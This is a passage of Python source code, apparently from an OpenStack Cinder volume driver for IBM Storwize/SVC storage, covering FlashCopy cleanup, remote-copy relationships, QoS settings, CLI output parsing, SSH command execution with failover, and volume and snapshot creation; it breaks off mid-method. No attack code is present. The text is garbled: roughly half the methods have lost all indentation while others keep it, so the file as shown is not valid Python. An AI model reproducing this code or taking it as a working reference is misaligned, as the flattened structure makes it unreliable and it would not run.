                               {'name': name, 'src': source, 'tgt': target})
                        LOG.error(msg)
                        raise exception.VolumeDriverException(message=msg)
                    if status in ['copying', 'prepared']:
                        self.ssh.stopfcmap(map_id)
                        # Need to wait for the fcmap to change to
                        # stopped state before remove fcmap
                        wait_for_copy = True
                    elif status in ['stopping', 'preparing']:
                        wait_for_copy = True
                    else:
                        self.ssh.rmfcmap(map_id)
            # Case 4: Copy in progress - wait and will autodelete
            else:
                if status == 'prepared':
                    self.ssh.stopfcmap(map_id)
                    self.ssh.rmfcmap(map_id)
                elif status == 'idle_or_copied':
                    # Prepare failed
                    self.ssh.rmfcmap(map_id)
                else:
                    wait_for_copy = True
        if not wait_for_copy or not len(mapping_ids):
            raise loopingcall.LoopingCallDone(retvalue=True)
    def ensure_vdisk_no_fc_mappings(self, name, allow_snaps=True):
        """Ensure vdisk has no flashcopy mappings.

        Runs _check_vdisk_fc_mappings on a fixed interval until it signals
        completion; returns that call's boolean result.
        """
        timer = loopingcall.FixedIntervalLoopingCall(
            self._check_vdisk_fc_mappings, name, allow_snaps)
        # Create a timer greenthread. The default volume service heart
        # beat is every 10 seconds. The flashcopy usually takes hours
        # before it finishes. Don't set the sleep interval shorter
        # than the heartbeat. Otherwise volume service heartbeat
        # will not be serviced.
        LOG.debug('Calling _ensure_vdisk_no_fc_mappings: vdisk %s.',
                  name)
        ret = timer.start(interval=self.check_fcmapping_interval).wait()
        timer.stop()
        return ret
    def start_relationship(self, volume_name, primary=None):
        # Start the volume's remote-copy relationship, if one exists.
        # 'primary' is forwarded to startrcrelationship to select the
        # primary side.
        vol_attrs = self.get_vdisk_attributes(volume_name)
        if vol_attrs['RC_name']:
            self.ssh.startrcrelationship(vol_attrs['RC_name'], primary)
    def stop_relationship(self, volume_name):
        # Stop the volume's remote-copy relationship (access=True is
        # forwarded to stoprcrelationship), if one exists.
        vol_attrs = self.get_vdisk_attributes(volume_name)
        if vol_attrs['RC_name']:
            self.ssh.stoprcrelationship(vol_attrs['RC_name'], access=True)
def create_relationship(self, master, aux, system, asyncmirror):
name = 'rcrel' + ''.join(random.sample(string.digits, 10))
try:
rc_id = self.ssh.mkrcrelationship(master, aux, system, name,
asyncmirror)
except exception.VolumeBackendAPIException as e:
# CMMVC5959E is the code in Stowize storage, meaning that
# there is a relationship that already has this name on the
# master cluster.
if 'CMMVC5959E' not in e:
# If there is no relation between the primary and the
# secondary back-end storage, the exception is raised.
raise
if rc_id:
self.start_relationship(master)
def delete_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'])
self.ssh.rmrcrelationship(vol_attrs['RC_name'])
vol_attrs = self.get_vdisk_attributes(volume_name)
def get_relationship_info(self, volume):
vol_attrs = self.get_vdisk_attributes(volume['name'])
if not vol_attrs or not vol_attrs['RC_name']:
LOG.info(_LI("Unable to get remote copy information for "
"volume %s"), volume['name'])
return
relationship = self.ssh.lsrcrelationship(vol_attrs['RC_name'])
return relationship[0] if len(relationship) > 0 else None
    def switch_relationship(self, relationship, aux=True):
        # Switch the direction of a remote-copy relationship; 'aux' is
        # forwarded to switchrelationship.
        self.ssh.switchrelationship(relationship, aux)
    def get_partnership_info(self, system_name):
        # Return the first partnership record for system_name, or None.
        partnership = self.ssh.lspartnership(system_name)
        return partnership[0] if len(partnership) > 0 else None
def get_partnershipcandidate_info(self, system_name):
candidates = self.ssh.lspartnershipcandidate()
for candidate in candidates:
if system_name == candidate['name']:
return candidate
return None
    def mkippartnership(self, ip_v4, bandwith=1000):
        # Create an IP-based partnership. NOTE: the 'bandwith' (sic)
        # keyword is kept misspelled for backward compatibility.
        self.ssh.mkippartnership(ip_v4, bandwith)
    def mkfcpartnership(self, system_name, bandwith=1000):
        # Create a Fibre Channel partnership (same 'bandwith' caveat).
        self.ssh.mkfcpartnership(system_name, bandwith)
    def startpartnership(self, partnership_id):
        # Start an existing (stopped) partnership.
        self.ssh.startpartnership(partnership_id)
    def delete_vdisk(self, vdisk, force):
        """Ensures that vdisk is not part of FC mapping and deletes it.

        :param force: forwarded to rmvdisk.
        """
        LOG.debug('Enter: delete_vdisk: vdisk %s.', vdisk)
        if not self.is_vdisk_defined(vdisk):
            # Deleting a nonexistent vdisk is a no-op, not an error.
            LOG.info(_LI('Tried to delete non-existent vdisk %s.'), vdisk)
            return
        self.ensure_vdisk_no_fc_mappings(vdisk)
        self.ssh.rmvdisk(vdisk, force=force)
        LOG.debug('Leave: delete_vdisk: vdisk %s.', vdisk)
    def create_copy(self, src, tgt, src_id, config, opts,
                    full_copy, pool=None):
        """Create a new snapshot using FlashCopy.

        Creates the target vdisk (same capacity as the source, in ``pool``
        or the source's pool) and starts a FlashCopy from src to tgt; the
        target is deleted again if starting the copy fails.

        :raises exception.VolumeDriverException: if the source is absent.
        """
        LOG.debug('Enter: create_copy: snapshot %(src)s to %(tgt)s.',
                  {'tgt': tgt, 'src': src})
        src_attrs = self.get_vdisk_attributes(src)
        if src_attrs is None:
            msg = (_('create_copy: Source vdisk %(src)s (%(src_id)s) '
                     'does not exist.') % {'src': src, 'src_id': src_id})
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        src_size = src_attrs['capacity']
        # In case we need to use a specific pool
        if not pool:
            pool = src_attrs['mdisk_grp_name']
        self.create_vdisk(tgt, src_size, 'b', pool, opts)
        timeout = config.storwize_svc_flashcopy_timeout
        try:
            self.run_flashcopy(src, tgt, timeout,
                               config.storwize_svc_flashcopy_rate,
                               full_copy=full_copy)
        except Exception:
            with excutils.save_and_reraise_exception():
                # Clean up the half-created target before re-raising.
                self.delete_vdisk(tgt, True)
        LOG.debug('Leave: _create_copy: snapshot %(tgt)s from '
                  'vdisk %(src)s.',
                  {'tgt': tgt, 'src': src})
    def extend_vdisk(self, vdisk, amount):
        # Grow the vdisk by 'amount'; units are handled by expandvdisksize.
        self.ssh.expandvdisksize(vdisk, amount)
    def add_vdisk_copy(self, vdisk, dest_pool, volume_type, state, config):
        """Add a vdisk copy in the given pool.

        :returns: (orig_copy_id, new_copy_id) tuple.
        :raises exception.VolumeDriverException: when the vdisk already has
            two copies, or no existing copy is found.
        """
        resp = self.ssh.lsvdiskcopy(vdisk)
        if len(resp) > 1:
            msg = (_('add_vdisk_copy failed: A copy of volume %s exists. '
                     'Adding another copy would exceed the limit of '
                     '2 copies.') % vdisk)
            raise exception.VolumeDriverException(message=msg)
        orig_copy_id = resp[0].get("copy_id", None)
        if orig_copy_id is None:
            msg = (_('add_vdisk_copy started without a vdisk copy in the '
                     'expected pool.'))
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        # Derive the new copy's creation parameters from the volume type
        # (or the configured defaults when no type is given).
        if volume_type is None:
            opts = self.get_vdisk_params(config, state, None)
        else:
            opts = self.get_vdisk_params(config, state, volume_type['id'],
                                         volume_type=volume_type)
        params = self._get_vdisk_create_params(opts)
        new_copy_id = self.ssh.addvdiskcopy(vdisk, dest_pool, params)
        return (orig_copy_id, new_copy_id)
def is_vdisk_copy_synced(self, vdisk, copy_id):
sync = self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]['sync']
if sync == 'yes':
return True
return False
def rm_vdisk_copy(self, vdisk, copy_id):
self.ssh.rmvdiskcopy(vdisk, copy_id)
@staticmethod
def can_migrate_to_host(host, state):
if 'location_info' not in host['capabilities']:
return None
info = host['capabilities']['location_info']
try:
(dest_type, dest_id, dest_pool) = info.split(':')
except ValueError:
return None
if (dest_type != 'StorwizeSVCDriver' or dest_id != state['system_id']):
return None
return dest_pool
def add_vdisk_qos(self, vdisk, qos):
"""Add the QoS configuration to the volume."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
self.ssh.chvdisk(vdisk, ['-' + param, str(value)])
def update_vdisk_qos(self, vdisk, qos):
"""Update all the QoS in terms of a key and value.
svc_qos_keys saves all the supported QoS parameters. Going through
this dict, we set the new values to all the parameters. If QoS is
available in the QoS configuration, the value is taken from it;
if not, the value will be set to default.
"""
for key, value in self.svc_qos_keys.items():
param = value['param']
if key in qos.keys():
# If the value is set in QoS, take the value from
# the QoS configuration.
v = qos[key]
else:
# If not, set the value to default.
v = value['default']
self.ssh.chvdisk(vdisk, ['-' + param, str(v)])
def disable_vdisk_qos(self, vdisk, qos):
"""Disable the QoS."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
# Take the default value.
value = self.svc_qos_keys[key]['default']
self.ssh.chvdisk(vdisk, ['-' + param, value])
def change_vdisk_options(self, vdisk, changes, opts, state):
if 'warning' in opts:
opts['warning'] = '%s%%' % str(opts['warning'])
if 'easytier' in opts:
opts['easytier'] = 'on' if opts['easytier'] else 'off'
if 'autoexpand' in opts:
opts['autoexpand'] = 'on' if opts['autoexpand'] else 'off'
for key in changes:
self.ssh.chvdisk(vdisk, ['-' + key, opts[key]])
def change_vdisk_iogrp(self, vdisk, state, iogrp):
if state['code_level'] < (6, 4, 0, 0):
LOG.debug('Ignore change IO group as storage code level is '
'%(code_level)s, below the required 6.4.0.0.',
{'code_level': state['code_level']})
else:
self.ssh.movevdisk(vdisk, str(iogrp[0]))
self.ssh.addvdiskaccess(vdisk, str(iogrp[0]))
self.ssh.rmvdiskaccess(vdisk, str(iogrp[1]))
    def vdisk_by_uid(self, vdisk_uid):
        """Returns the properties of the vdisk with the specified UID.

        Returns None if no such disk exists.

        :raises exception.VolumeBackendAPIException: if the UID filter
            unexpectedly matches more than one vdisk.
        """
        vdisks = self.ssh.lsvdisks_from_filter('vdisk_UID', vdisk_uid)
        if len(vdisks) == 0:
            return None
        if len(vdisks) != 1:
            msg = (_('Expected single vdisk returned from lsvdisk when '
                     'filtering on vdisk_UID. %(count)s were returned.') %
                   {'count': len(vdisks)})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        vdisk = vdisks.result[0]
        # Re-read by name to return full lsvdisk detail for the match.
        return self.ssh.lsvdisk(vdisk['name'])
    def is_vdisk_in_use(self, vdisk):
        """Returns True if the specified vdisk is mapped to at least 1 host."""
        resp = self.ssh.lsvdiskhostmap(vdisk)
        return len(resp) != 0
    def rename_vdisk(self, vdisk, new_name):
        # chvdisk -name renames the vdisk on the array.
        self.ssh.chvdisk(vdisk, ['-name', new_name])
    def change_vdisk_primary_copy(self, vdisk, copy_id):
        # Make the given copy the primary of a mirrored vdisk.
        self.ssh.chvdisk(vdisk, ['-primary', copy_id])
class CLIResponse(object):
    """Parse SVC CLI output and generate iterable.

    Wraps raw CLI output (a string, or an (stdout, stderr) pair) and
    parses it into ``self.result``, a list of dicts: one dict per data
    row when ``with_header`` is True, otherwise one dict per
    blank-line-separated section.
    """
    def __init__(self, raw, ssh_cmd=None, delim='!', with_header=True):
        # :param raw: CLI output; a string or an (stdout, stderr) tuple.
        # :param ssh_cmd: originating command (list), kept for error text.
        # :param delim: field delimiter used in the CLI output.
        # :param with_header: True when the first line is a header row.
        super(CLIResponse, self).__init__()
        if ssh_cmd:
            self.ssh_cmd = ' '.join(ssh_cmd)
        else:
            self.ssh_cmd = 'None'
        self.raw = raw
        self.delim = delim
        self.with_header = with_header
        self.result = self._parse()
    def select(self, *keys):
        """Yield the values of ``keys`` from every parsed row.

        Scalar (or missing) values are wrapped as one-element lists so
        that multi-valued fields zip together; yields a bare value for a
        single key, otherwise a tuple per zipped row.
        """
        for a in self.result:
            vs = []
            for k in keys:
                v = a.get(k, None)
                if isinstance(v, six.string_types) or v is None:
                    v = [v]
                if isinstance(v, list):
                    vs.append(v)
            for item in zip(*vs):
                if len(item) == 1:
                    yield item[0]
                else:
                    yield item
    def __getitem__(self, key):
        # Index into the parsed rows; a missing key becomes a backend
        # API error that includes the originating command and raw output.
        try:
            return self.result[key]
        except KeyError:
            msg = (_('Did not find the expected key %(key)s in %(fun)s: '
                     '%(raw)s.') % {'key': key, 'fun': self.ssh_cmd,
                                    'raw': self.raw})
            raise exception.VolumeBackendAPIException(data=msg)
    def __iter__(self):
        for a in self.result:
            yield a
    def __len__(self):
        return len(self.result)
    def _parse(self):
        """Parse self.raw into a list of dicts (see class docstring)."""
        def get_reader(content, delim):
            # Yield each non-blank line split on delim; blank lines
            # yield [] (used as section separators below).
            for line in content.lstrip().splitlines():
                line = line.strip()
                if line:
                    yield line.split(delim)
                else:
                    yield []
        if isinstance(self.raw, six.string_types):
            stdout, stderr = self.raw, ''
        else:
            stdout, stderr = self.raw
        reader = get_reader(stdout, self.delim)
        result = []
        if self.with_header:
            # First row is the header; every later row must match its
            # column count and becomes one dict.
            hds = tuple()
            for row in reader:
                hds = row
                break
            for row in reader:
                cur = dict()
                if len(hds) != len(row):
                    msg = (_('Unexpected CLI response: header/row mismatch. '
                             'header: %(header)s, row: %(row)s.')
                           % {'header': hds,
                              'row': row})
                    raise exception.VolumeBackendAPIException(data=msg)
                for k, v in zip(hds, row):
                    CLIResponse.append_dict(cur, k, v)
                result.append(cur)
        else:
            # Key/value listing mode: first field is the key, the rest is
            # the value; blank lines separate per-object sections.
            cur = dict()
            for row in reader:
                if row:
                    CLIResponse.append_dict(cur, row[0], ' '.join(row[1:]))
                elif cur:  # start new section
                    result.append(cur)
                    cur = dict()
            if cur:
                result.append(cur)
        return result
    @staticmethod
    def append_dict(dict_, key, value):
        """Add key->value, growing a repeated key's entry into a list."""
        key, value = key.strip(), value.strip()
        obj = dict_.get(key, None)
        if obj is None:
            dict_[key] = value
        elif isinstance(obj, list):
            obj.append(value)
            dict_[key] = obj
        else:
            dict_[key] = [obj, value]
        return dict_
class StorwizeSVCCommonDriver(san.SanDriver,
                              driver.ManageableVD,
                              driver.ExtendVD, driver.SnapshotVD,
                              driver.MigrateVD, driver.ReplicaVD,
                              driver.ConsistencyGroupVD,
                              driver.CloneableImageVD,
                              driver.TransferVD):
    """IBM Storwize V7000 SVC abstract base class for iSCSI/FC volume drivers.

    Version history:
    1.0 - Initial driver
    1.1 - FC support, create_cloned_volume, volume type support,
          get_volume_stats, minor bug fixes
    1.2.0 - Added retype
    1.2.1 - Code refactor, improved exception handling
    1.2.2 - Fix bug #1274123 (races in host-related functions)
    1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
            lsfabric, clear unused data from connections, ensure matching
            WWPNs by comparing lower case
    1.2.4 - Fix bug #1278035 (async migration/retype)
    1.2.5 - Added support for manage_existing (unmanage is inherited)
    1.2.6 - Added QoS support in terms of I/O throttling rate
    1.3.1 - Added support for volume replication
    1.3.2 - Added support for consistency group
    1.3.3 - Update driver to use ABC metaclasses
    2.0 - Code refactor, split init file and placed shared methods for
          FC and iSCSI within the StorwizeSVCCommonDriver class
    2.1 - Added replication V2 support to the global/metro mirror
          mode
    2.1.1 - Update replication to version 2.1
    """
    VERSION = "2.1.1"
    # Seconds between passes of the vdisk-copy progress loop (do_setup).
    VDISKCOPYOPS_INTERVAL = 600
    # Supported replication modes.
    GLOBAL = 'global'
    METRO = 'metro'
    VALID_REP_TYPES = (GLOBAL, METRO)
    # NOTE(review): appears to be the sentinel secondary id meaning
    # "fail back to the primary" -- confirm against failover callers.
    FAILBACK_VALUE = 'default'
    def __init__(self, *args, **kwargs):
        """Initialize driver state; real backend discovery is in do_setup."""
        super(StorwizeSVCCommonDriver, self).__init__(*args, **kwargs)
        self.configuration.append_config_values(storwize_svc_opts)
        self._backend_name = self.configuration.safe_get('volume_backend_name')
        self._helpers = StorwizeHelpers(self._run_ssh)
        # volume-id -> list of in-progress (orig_copy_id, new_copy_id) ops.
        self._vdiskcopyops = {}
        self._vdiskcopyops_loop = None
        # Set by the protocol-specific subclass ('iSCSI' or 'FC').
        self.protocol = None
        self.replication = None
        # Backend facts discovered in do_setup.
        self._state = {'storage_nodes': {},
                       'enabled_protocols': set(),
                       'compression_enabled': False,
                       'available_iogrps': [],
                       'system_name': None,
                       'system_id': None,
                       'code_level': None,
                       }
        self._active_backend_id = kwargs.get('active_backend_id')
        # Since there are three replication modes supported by Storwize,
        # this dictionary is used to map the replication types to certain
        # replications.
        self.replications = {}
        # One driver can be configured with multiple replication targets
        # to failover.
        self._replication_targets = []
        # This boolean is used to indicate whether this driver is configured
        # with replication.
        self._replication_enabled = False
        # This list is used to save the supported replication modes.
        self._supported_replication_types = []
        # Storwize has the limitation that can not burst more than 3 new ssh
        # connections within 1 second. So slow down the initialization.
        time.sleep(1)
    def do_setup(self, ctxt):
        """Check that we have all configuration details from the storage.

        Discovers system facts, validates pools, builds the per-node
        protocol map, resumes pending vdisk-copy operations from the DB,
        and performs v2 replication setup.
        """
        LOG.debug('enter: do_setup')

        # Get storage system name, id, and code level
        self._state.update(self._helpers.get_system_info())

        # Get the replication helpers
        self.replication = storwize_rep.StorwizeSVCReplication.factory(self)

        # Validate that the pool exists
        self._validate_pools_exist()

        # Check if compression is supported
        self._state['compression_enabled'] = (self._helpers.
                                              compression_enabled())

        # Get the available I/O groups
        self._state['available_iogrps'] = (self._helpers.
                                           get_available_io_groups())

        # Get the iSCSI and FC names of the Storwize/SVC nodes
        self._state['storage_nodes'] = self._helpers.get_node_info()

        # Add the iSCSI IP addresses and WWPNs to the storage node info
        self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
        self._helpers.add_fc_wwpns(self._state['storage_nodes'])

        # For each node, check what connection modes it supports.  Delete any
        # nodes that do not support any types (may be partially configured).
        to_delete = []
        for k, node in self._state['storage_nodes'].items():
            # iSCSI requires at least one IP address plus an iSCSI name.
            if ((len(node['ipv4']) or len(node['ipv6']))
                    and len(node['iscsi_name'])):
                node['enabled_protocols'].append('iSCSI')
                self._state['enabled_protocols'].add('iSCSI')
            if len(node['WWPN']):
                node['enabled_protocols'].append('FC')
                self._state['enabled_protocols'].add('FC')
            if not len(node['enabled_protocols']):
                to_delete.append(k)
        for delkey in to_delete:
            del self._state['storage_nodes'][delkey]

        # Build the list of in-progress vdisk copy operations
        if ctxt is None:
            admin_context = context.get_admin_context()
        else:
            admin_context = ctxt.elevated()
        volumes = self.db.volume_get_all_by_host(admin_context, self.host)

        for volume in volumes:
            metadata = self.db.volume_admin_metadata_get(admin_context,
                                                         volume['id'])
            # Ops are persisted as 'orig:new;orig:new;...' string pairs.
            curr_ops = metadata.get('vdiskcopyops', None)
            if curr_ops:
                ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
                self._vdiskcopyops[volume['id']] = ops

        # if vdiskcopy exists in database, start the looping call
        if len(self._vdiskcopyops) >= 1:
            self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
                self._check_volume_copy_ops)
            self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
        LOG.debug('leave: do_setup')

        # v2 replication setup
        self._do_replication_setup()
    def _validate_pools_exist(self):
        """Verify every configured storage pool is reachable.

        :raises exception.InvalidInput: when any configured pool cannot
            be queried on the backend.
        """
        # Validate that the pool exists
        pools = self.configuration.storwize_svc_volpool_name
        for pool in pools:
            try:
                self._helpers.get_pool_attrs(pool)
            except exception.VolumeBackendAPIException:
                msg = _('Failed getting details for pool %s.') % pool
                raise exception.InvalidInput(reason=msg)
    def check_for_setup_error(self):
        """Ensure that the flags are set properly.

        Validates the state gathered by do_setup (system id/name, nodes,
        protocol support) and the required configuration options.
        """
        LOG.debug('enter: check_for_setup_error')

        # Check that we have the system ID information
        if self._state['system_name'] is None:
            exception_msg = (_('Unable to determine system name.'))
            raise exception.VolumeBackendAPIException(data=exception_msg)
        if self._state['system_id'] is None:
            exception_msg = (_('Unable to determine system id.'))
            raise exception.VolumeBackendAPIException(data=exception_msg)

        # Make sure we have at least one node configured
        if not len(self._state['storage_nodes']):
            msg = _('do_setup: No configured nodes.')
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)

        # The subclass's protocol must be among those the backend supports.
        if self.protocol not in self._state['enabled_protocols']:
            # TODO(mc_nair): improve this error message by looking at
            # self._state['enabled_protocols'] to tell user what driver to use
            raise exception.InvalidInput(
                reason=_('The storage device does not support %(prot)s. '
                         'Please configure the device to support %(prot)s or '
                         'switch to a driver using a different protocol.')
                % {'prot': self.protocol})

        required_flags = ['san_ip', 'san_ssh_port', 'san_login',
                          'storwize_svc_volpool_name']
        for flag in required_flags:
            if not self.configuration.safe_get(flag):
                raise exception.InvalidInput(reason=_('%s is not set.') % flag)

        # Ensure that either password or keyfile were set
        if not (self.configuration.san_password or
                self.configuration.san_private_key):
            raise exception.InvalidInput(
                reason=_('Password or SSH private key is required for '
                         'authentication: set either san_password or '
                         'san_private_key option.'))

        # Validate the default vdisk options against the backend state.
        opts = self._helpers.build_default_opts(self.configuration)
        self._helpers.check_vdisk_opts(self._state, opts)

        LOG.debug('leave: check_for_setup_error')
    def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
        """Run an SSH command on the storage system.

        Lazily creates the SSH pool from san_ip, falling back to
        storwize_san_secondary_ip when the primary is unreachable.  If the
        command then fails, the pool is rebuilt on the other configured IP
        and the command is retried once there.

        :param cmd_list: command and its arguments as a list of strings
        :param check_exit_code: forwarded to the SSH executor
        :param attempts: per-pool retry count forwarded to _ssh_execute
        """
        # Guard against shell metacharacters before joining the arguments.
        cinder_utils.check_ssh_injection(cmd_list)
        command = ' '.join(cmd_list)
        if not self.sshpool:
            try:
                self.sshpool = self._set_up_sshpool(self.configuration.san_ip)
            except paramiko.SSHException:
                LOG.warning(_LW('Unable to use san_ip to create SSHPool. Now '
                                'attempting to use storwize_san_secondary_ip '
                                'to create SSHPool.'))
                if self.configuration.storwize_san_secondary_ip is not None:
                    self.sshpool = self._set_up_sshpool(
                        self.configuration.storwize_san_secondary_ip)
                else:
                    LOG.warning(_LW('Unable to create SSHPool using san_ip '
                                    'and not able to use '
                                    'storwize_san_secondary_ip since it is '
                                    'not configured.'))
                    raise
        try:
            return self._ssh_execute(self.sshpool, command,
                                     check_exit_code, attempts)
        except Exception:
            # Need to check if creating an SSHPool storwize_san_secondary_ip
            # before raising an error.
            if self.configuration.storwize_san_secondary_ip is not None:
                if (self.sshpool.ip ==
                        self.configuration.storwize_san_secondary_ip):
                    # Already on the secondary IP; switch back to san_ip.
                    LOG.warning(_LW("Unable to execute SSH command with "
                                    "storwize_san_secondary_ip. "
                                    "Attempting to switch IP back "
                                    "to san_ip %s."),
                                self.configuration.san_ip)
                    self.sshpool = self._set_up_sshpool(
                        self.configuration.san_ip)
                    return self._ssh_execute(self.sshpool, command,
                                             check_exit_code, attempts)
                else:
                    # Still on san_ip; try the secondary IP instead.
                    LOG.warning(_LW("Unable to execute SSH command. "
                                    "Attempting to switch IP to %s."),
                                self.configuration.storwize_san_secondary_ip)
                    self.sshpool = self._set_up_sshpool(
                        self.configuration.storwize_san_secondary_ip)
                    return self._ssh_execute(self.sshpool, command,
                                             check_exit_code, attempts)
            else:
                # No secondary IP to fall back to: log and re-raise.
                LOG.warning(_LW('Unable to execute SSH command. '
                                'Not able to use '
                                'storwize_san_secondary_ip since it is '
                                'not configured.'))
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE("Error running SSH command: %s"),
                              command)
def _set_up_sshpool(self, ip):
password = self.configuration.san_password
privatekey = self.configuration.san_private_key
min_size = self.configuration.ssh_min_pool_conn
max_size = self.configuration.ssh_max_pool_conn
sshpool = ssh_utils.SSHPool(
ip,
self.configuration.san_ssh_port,
self.configuration.ssh_conn_timeout,
self.configuration.san_login,
password=password,
privatekey=privatekey,
min_size=min_size,
max_size=max_size)
return sshpool
def _ssh_execute(self, sshpool, command,
check_exit_code = True, attempts=1):
try:
with sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
return processutils.ssh_execute(
ssh,
command,
check_exit_code=check_exit_code)
except Exception as e:
LOG.error(_LE('Error has occurred: %s'), e)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"), command)
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_LE('ensure_export: Volume %s not found on storage.'),
volume['name'])
def create_export(self, ctxt, volume, connector):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def _get_vdisk_params(self, type_id, volume_type=None,
volume_metadata=None):
return self._helpers.get_vdisk_params(self.configuration,
self._state, type_id,
volume_type=volume_type,
volume_metadata=volume_metadata)
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
model_update = None
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
model_update = {'replication_status': 'enabled'}
elif opts.get('replication'):
model_update = self.replication.create_replica(ctxt, volume)
return model_update
def delete_volume(self, volume):
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).delete_target_volume(
volume)
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
pool = utils.extract_host(source_vol['host'], 'pool')
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False, pool=pool)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True, pool=pool)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, volume)
if replica_status:
return replica_status
    def create_cloned_volume(self, tgt_volume, src_volume):
        """Creates a clone of the specified volume.

        :param tgt_volume: the new volume to create; may be larger than the
                           source but never smaller
        :param src_volume: the existing volume to copy from
        :raises InvalidInput: if the source is larger than the target
        :returns: a replication model update when replication applies,
                  otherwise None
        """
        if src_volume['size'] > tgt_volume['size']:
            msg = (_("create_cloned_volume: source volume %(src_vol)s "
                     "size is %(src_size)dGB and doesn't fit in target "
                     "volume %(tgt_vol)s of size %(tgt_size)dGB.") %
                   {'src_vol': src_volume['name'],
                    'src_size': src_volume['size'],
                    'tgt_vol': tgt_volume['name'],
                    'tgt_size': tgt_volume['size']})
            LOG.error(msg)
            raise exception.InvalidInput(message=msg)
        opts = self._get_vdisk_params(tgt_volume['volume_type_id'],
                                      volume_metadata=
                                      tgt_volume.get('volume_metadata'))
        pool = utils.extract_host(tgt_volume['host'], 'pool')
        self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
                                  src_volume['id'], self.configuration,
                                  opts, True, pool=pool)
        # The source volume size is equal to target volume size
        # in most of the cases. But in some scenario, the target
        # volume size may be bigger than the source volume size.
        # SVC does not support flashcopy between two volumes
        # with two different size. So use source volume size to
        # create target volume first and then extend target
        # volume to original size.
        if tgt_volume['size'] > src_volume['size']:
            # extend the new created target volume to expected size.
            self._extend_volume_op(tgt_volume, tgt_volume['size'],
                                   src_volume['size'])
        if opts['qos']:
            self._helpers.add_vdisk_qos(tgt_volume['name'], opts['qos'])
        ctxt = context.get_admin_context()
        rep_type = self._get_volume_replicated_type(ctxt, tgt_volume)
        # The replication V2 has a higher priority than the replication V1.
        # Check if V2 is available first, then check if V1 is available.
        if rep_type and self._replication_enabled:
            self.replications.get(rep_type).volume_replication_setup(
                ctxt, tgt_volume)
            return {'replication_status': 'enabled'}
        elif opts.get('replication'):
            replica_status = self.replication.create_replica(ctxt, tgt_volume)
            if replica_status:
                return replica_status
def extend_volume(self, volume, new_size):
self._extend_volume_op(volume, new_size)
def _extend_volume_op(self, volume, new_size, old_size=None):
LOG.debug('enter: _extend_volume_op: volume %s', volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('_extend_volume_op: Extending a volume with snapshots is '
'not supported.'))
